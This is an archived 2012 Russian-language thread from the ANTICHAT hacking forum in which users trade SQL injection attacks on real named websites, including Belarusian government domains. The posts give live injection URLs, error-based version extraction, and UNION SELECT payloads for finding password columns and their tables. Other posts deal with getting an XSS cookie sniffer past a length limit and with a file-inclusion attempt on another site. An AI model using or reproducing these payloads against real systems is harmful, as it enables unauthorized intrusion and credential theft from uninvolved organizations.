ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.01.2012, 20:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Это MySQL?
_http://www.minprom.gov.by/organizacii?OKPO=24+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17
|
|
|
|
23.01.2012, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Версию вывел, а как сейчас таблицы вывести, подскажите?
_http://www.oim.by/en/department'and(select*from(select(name_const(versi on(),1)),name_const(version(),1))a)and'
Duplicate column name '5.5.8'
|
|
|
|
24.01.2012, 01:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Нашел активку на одном сайте...нет фильтра имени и фамилии. но стоит ограничение по символам. я разбиваю код на две части...пихаю...получается такая штука
перед .ru стоит пробел и естественно снифер не срабатывает. как можно изловчиться и исправить?
|
|
|
|
24.01.2012, 01:35
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
justonline, используй сервис сокращения ссылок
|
|
|
26.01.2012, 00:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать
|
|
|
|
26.01.2012, 00:56
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pirat0
pirat0 said:
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать
union select 1,2,concat(table_name,0x3a,column_name),4,5,6
|
|
|
|
26.01.2012, 01:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
спосибо, а то название таблиц не стандартное - "a_affiliates"
|
|
|
|
26.01.2012, 01:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
Code:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index
немного не понял ошибку, объясните |
|
|
|
26.01.2012, 08:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от faza02
faza02 said:
Код:
Code:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index
немного не понял ошибку, объясните index.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include[/COLOR][COLOR="#DD0000"]'include/include.php'[/COLOR][COLOR="#007700"];
include[/COLOR][COLOR="#DD0000"]'some/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]child[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
include/include.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]
function[/COLOR][COLOR="#0000BB"]strips[/COLOR][COLOR="#007700"](){[/COLOR][COLOR="#FF8000"]/*whatever*/[/COLOR][COLOR="#007700"]}
[...]
[/COLOR][/COLOR]
index.php?
функция и так обозначается, и инклудя свой же файл ты вызываешь обозначение той же самой функции, но т.к. она уже обозначена ты получаешь ошибку.
|
|
|
|
26.01.2012, 11:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Сообщение от pirat0
pirat0 said:
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать
Сразу выводи название таблиц и колонок, чтобы их потом отдельно не смотреть.
Сообщение от None
union select 1,2,concat_ws(0x3a,table_name,column_name),4,5,6 from information_schema.columns where column_name like '%pass%' limit 0,20-- f
UPD: Konqi уже ответил не заметил
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
